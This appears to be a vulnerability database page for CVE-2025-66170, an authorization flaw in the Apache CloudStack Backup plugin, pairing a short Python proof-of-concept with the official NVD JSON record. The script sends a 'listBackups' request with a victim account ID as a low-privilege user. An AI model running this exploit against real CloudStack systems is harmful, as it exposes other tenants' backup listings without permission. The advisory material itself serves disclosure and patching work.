CVE-2025-66170

import requests # Exploit Title: Apache CloudStack Backup Plugin Privilege Escalation (List Backups) # Date: 2025-05-08 # Exploit Author: Analyst # Vendor Homepage: https://cloudstack.apache.org/ # Version: 4.21.0.0, 4.22.0.0 def exploit(target_url, api_key, victim_account_id): """ Attempts to list backups for a specific victim account using a low-privilege user. """ # API endpoint for listing backups (example endpoint structure) endpoint = f"{target_url}/client/api" # Payload parameters simulating the API command command = "listBackups" params = { "command": command, "accountid": victim_account_id, # The vulnerable parameter: overriding account context "response": "json" } # Signing the request (simplified for PoC) headers = { "Cookie": f"JSESSIONID={api_key}", "Authorization": f"Bearer {api_key}" } try: response = requests.get(endpoint, params=params, headers=headers, verify=False) if response.status_code == 200: print("[+] Successfully retrieved backup list:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://cloudstack-target:8080" # Replace with valid credentials for a low-privilege user low_priv_api_key = "LOW_PRIV_USER_API_KEY" # Target account ID to enumerate target_account = "admin-uuid-or-id" exploit(target, low_priv_api_key, target_account)

{"cve": {"id": "CVE-2025-66170", "sourceIdentifier": "[email protected]", "published": "2026-05-08T13:16:35.360", "lastModified": "2026-05-11T15:24:18.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CloudStack Backup plugin has an improper authorization logic in versions 4.21.0.0 and 4.22.0.0. Anyone with authenticated user-account access in CloudStack 4.21.0.0+ environments, where this plugin is enabled and has access to specific APIs can list backups from any account in the environment. This vulnerability does not allow them to see the contents of the backup.\n\nUsers are recommended to upgrade to version 4.22.0.1, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.21.0.0", "versionEndExcluding": "4.22.0.1", "matchCriteriaId": "78690ED1-C4B3-4DC9-9B53-FB31D6D17125"}]}]}], "references": [{"url": "https://lists.apache.org/thread/n8mt5b7wkpysstb8w7rr9f02kc5cq2xm", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/09/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}